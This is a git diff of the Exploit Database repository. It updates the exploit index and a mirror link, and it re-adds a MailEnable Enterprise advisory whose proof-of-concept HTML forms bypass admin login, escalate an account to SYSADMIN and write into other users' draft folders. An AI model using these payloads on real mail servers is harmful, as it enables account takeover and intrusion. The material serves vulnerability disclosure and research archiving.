21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 Default Error Page Cross-Site Scripting Vulnerability",2002-07-17,"Peter Gründl",jsp,webapps,0
21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting Vulnerability",2002-07-17,Pistone,php,webapps,0
21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle Unsafe eval() Code Execution Vulnerability",2002-07-17,"Jeff Epler",linux,local,0
@ -18913,7 +18913,7 @@ id,file,description,date,author,platform,type,port
21633,platforms/windows/remote/21633.c,"SmartMax MailMax 4.8 Popmax Buffer Overflow Vulnerability",2002-07-20,anonymous,windows,remote,0
21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (1)",2002-07-23,Kyuzo,windows,dos,0
21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (2)",2002-07-23,"andrea lisci",windows,remote,0
21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_ms Internet Explorer 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0
21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0
21637,platforms/hardware/dos/21637.c,"Zyxel Prestige 642R Router Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0
21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability",2002-07-24,"Andreas Sandblad",multiple,remote,0
21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0
@ -20219,7 +20219,7 @@ id,file,description,date,author,platform,type,port
22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow Vulnerabilities",2003-07-29,V9,linux,local,0
22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0
22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,metasploit,windows,remote,0
22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0
22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0
23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0
22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0
22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 realpath() Off-By-One Buffer Overflow Vulnerability",2003-07-31,daniels@legend.co.uk,freebsd,remote,0
@ -20351,7 +20351,7 @@ id,file,description,date,author,platform,type,port
23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 File Disclosure Vulnerability",2003-09-08,euronymous,windows,remote,0
23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 XML Page Object Type Validation Vulnerability",2003-09-08,http-equiv,windows,remote,0
23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun Vulnerability",2003-09-08,D4rkGr3y,windows,remote,0
23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability",2003-09-08,"Luigi Auriemma",windows,dos,0
23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability",2003-09-08,"Luigi Auriemma",windows,dos,0
23125,platforms/php/webapps/23125.txt,"PHPBB 2.0.6 URL BBCode HTML Injection Vulnerability",2003-09-08,keupon_ps2,php,webapps,0
23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Local Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0
23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine PAGE Parameter Cross-Site Scripting Vulnerability",2003-09-09,"Bahaa Naamneh",cgi,webapps,0
@ -21649,7 +21649,7 @@ id,file,description,date,author,platform,type,port
24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0
24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0
24468,platforms/windows/dos/24468.pl,"KMPlayer All Versions - Denial of Service",2013-02-10,Jigsaw,windows,dos,0
24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader (catalog.php id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0
24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0
24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0
@ -22219,7 +22219,7 @@ id,file,description,date,author,platform,type,port
25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0
25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0
25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0
25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0
25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0
25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0
25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service Vulnerability",2005-01-27,MC.Iglo,windows,dos,0
25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0
@ -22582,7 +22582,7 @@ id,file,description,date,author,platform,type,port
25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting Vulnerability",2005-04-18,"hoang yen",php,webapps,0
25439,platforms/multiple/dos/25439.c,"Multiple Vendor TCP Session Acknowledgement Number Denial of Service Vulnerability",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0
25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager - Arbitrary File Download Vulnerability",2013-05-14,ByEge,php,webapps,0
25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0
25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) All Versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0
25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0
25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0
25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit",2013-05-14,sd,linux,local,0
@ -24978,7 +24978,7 @@ id,file,description,date,author,platform,type,port
27871,platforms/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0
27872,platforms/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0
27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - RCE PoC",2013-08-26,Aodrulez,hardware,remote,0
27874,platforms/windows/local/27874.py,"WinAmp 5.63 (winamp.ini) - Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27875,platforms/linux/dos/27875.c,"libtiff <= 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0
27876,platforms/php/webapps/27876.txt,"Musicbox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0
27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,metasploit,windows,remote,7770
@ -29621,7 +29621,7 @@ id,file,description,date,author,platform,type,port
32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection Vulnerability",2009-03-10,x0r,php,webapps,0
32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure Vulnerability",2009-03-10,"Andres Freund",multiple,local,0
32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 - Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
32851,platforms/windows/remote/32851.html,"Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
@ -29683,7 +29683,7 @@ id,file,description,date,author,platform,type,port
32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 - 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
@ -30069,7 +30069,7 @@ id,file,description,date,author,platform,type,port
33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting Vulnerability",2009-10-26,blake,php,webapps,0
33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1_ESXi Server <= 3.5 - Directory Traversal Vulnerability",2009-10-27,"Justin Morehouse",multiple,remote,0
33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0
33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0
33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 - Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0
33313,platforms/linux/remote/33313.txt,"Mozilla Firefox <= 3.5.3 and SeaMonkey <= 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow Vulnerability",2009-10-27,regenrecht,linux,remote,0
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
@ -31253,7 +31253,7 @@ id,file,description,date,author,platform,type,port
34688,platforms/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting Vulnerability",2009-07-27,PLATEN,php,webapps,0
34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injection Vulnerabilities",2009-08-27,Evil-Cod3r,php,webapps,0
34690,platforms/php/webapps/34690.txt,"@Mail <= 6.1.9 - 'MailType' Parameter Cross-Site Scripting Vulnerability",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0
34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser HTML Injection Vulnerability",2010-09-21,"Sumit Kumar Soni",multiple,remote,0
34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection Vulnerability",2010-09-21,"Sumit Kumar Soni",multiple,remote,0
34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting Vulnerability",2009-07-27,u.f.,php,webapps,0
34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting Vulnerability",2009-08-27,"599eme Man",php,webapps,0
34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 - Multiple SQL Injection Vulnerabilities",2009-07-24,Qabandi,php,webapps,0
@ -31591,7 +31591,7 @@ id,file,description,date,author,platform,type,port
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php - client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
@ -32994,7 +32994,7 @@ id,file,description,date,author,platform,type,port
36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
36575,platforms/multiple/webapps/36575.py,"JBoss AS 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0
36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Local Root Exploit",2015-04-13,mu-b,osx,local,0
@ -33247,7 +33247,7 @@ id,file,description,date,author,platform,type,port
36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
36840,platforms/multiple/dos/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0
36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0
@ -33681,11 +33681,23 @@ id,file,description,date,author,platform,type,port
37297,platforms/linux/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader (58 bytes)",2015-06-16,B3mB4m,linux,shellcode,0
37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0
37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 'Sajax.php' PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0
37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0
37321,platforms/php/webapps/37321.txt,"DynPage 1.0 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0
37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0
37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability",2015-06-19,Vulnerability-Lab,hardware,webapps,0
37325,platforms/multiple/webapps/37325.txt,"Lively cart SQL Injection vulnerability",2015-06-19,"Manish Tanwar",multiple,webapps,0
37325,platforms/multiple/webapps/37325.txt,"Lively Cart SQL Injection Vulnerability",2015-06-19,"Manish Tanwar",multiple,webapps,0
37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0
37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0
37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting Vulnerability",2012-06-01,Aboud-el,php,webapps,0
37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0
37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0

Can't render this file because it is too large.

2
platforms/android/local/9477.txt
View file

@ -1,6 +1,6 @@
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
# milw0rm.com [2009-08-18]

276
platforms/asp/webapps/1893.txt
View file

@ -1,138 +1,138 @@
Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in
MailEnable Enterprise Edition ASP Version <= 2.0 that I listed them below:
1) - Any user can login to web administration site.
2) - Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
3) - Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
4) - Every one can make "myupload.ams" on server in "drafts" folder of every user!
5) - Every one can make "_myupload.csv" on server in "drafts" folder of every user!
6) - For changing password it need the current password but current password is mention in source of "ListAttachments.asp" file, if XSS attack or Session hijacking happened then attacker can gain the user's current password.
Details' Descriptions:
1)
Any user can login to web administration site with bug in "main.asp" (Enterprise)
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/meadmin/enterprise/lang/EN/main.asp" METHOD="POST">
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="postmaster"><br>
<input type=submit>
</FORM>
-----------------------End----------------------------
2)
Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
Bug in "MailOptions.asp" file: remote authenticated user can change value of hidden field (name="LoginRights")
from "USER" to "ADMIN" or "SYSADMIN" and change it's level to up! or change value of hidden field
(name="LoginStatus") to "0" to disable him/her account!
Proof's exploit:
-----------------------Start--------------------------
<FORM METHOD="post" ACTION="http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit">
<TABLE BORDER="0">
<TR><TD>Current Password:</TD><TD><INPUT name=LoginPassword VALUE=""></TD></TR>
<TR><TD>New Password:</TD><TD><INPUT name=NewLoginPassword VALUE=""></TD></TR>
<TR><TD>Confirm New Password:</TD><TD><INPUT name=ConfirmNewLoginPassword VALUE=""></TD></TR>
</TABLE>
<INPUT NAME="LoginDescription" VALUE="Login description">
<INPUT NAME="LoginRights" VALUE="SYSADMIN">
<INPUT NAME="LoginStatus" VALUE="1">
<BR><BR>
<INPUT type=submit value="UpTime!">
</FORM>
-----------------------End----------------------------
3)
Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
Bug in "Resolve.asp" file: this file don't check authenticated user!
Proof's exploit:
--------------Start---------------------
<FORM METHOD="post" ACTION="http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp">
<TABLE BORDER="0">
<TR><TD>ME_MAILBOX:</TD><TD><INPUT name=ME_MAILBOX VALUE=""></TD></TR>
<TR><TD>ME_POSTOFFICE:</TD><TD><INPUT name=ME_POSTOFFICE VALUE=""></TD></TR>
<TR><TD>Folder:</TD><TD><INPUT name=Folder VALUE=""></TD></TR>
<TR><TD>ID:</TD><TD><INPUT name=ID VALUE=""></TD></TR>
<TR><TD>ComposeMode:</TD><TD><INPUT name=ComposeMode VALUE="General"></TD></TR>
<TR><TD>MsgFrom:</TD><TD><INPUT name=MsgFrom VALUE=""></TD></TR>
<TR><TD>MsgCc:</TD><TD><INPUT name=MsgCc VALUE=""></TD></TR>
<TR><TD>MsgTo:</TD><TD><INPUT name=MsgTo VALUE=""></TD></TR>
<TR><TD>MsgBCC:</TD><TD><INPUT name=MsgBCC VALUE=""></TD></TR>
<TR><TD>MsgBody:</TD><TD><INPUT name=MsgBody VALUE=""></TD></TR>
<TR><TD>MsgSubject:</TD><TD><INPUT name=MsgSubject VALUE=""></TD></TR>
</TABLE>
<BR><BR>
<INPUT type=submit value="Update" CLASS=ME_Button>
</FORM>
--------------End---------------------
4)
Make "myupload.ams" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
5)
Make "_myupload.csv" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test123"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test123"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
6)
Have password in source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------
Product name: MailEnable Enterprise Edition
Version: All ASP version <= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com
<< I hope secure world for all >>
# milw0rm.com [2006-06-09]
Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in
MailEnable Enterprise Edition ASP Version <= 2.0 that I listed them below:
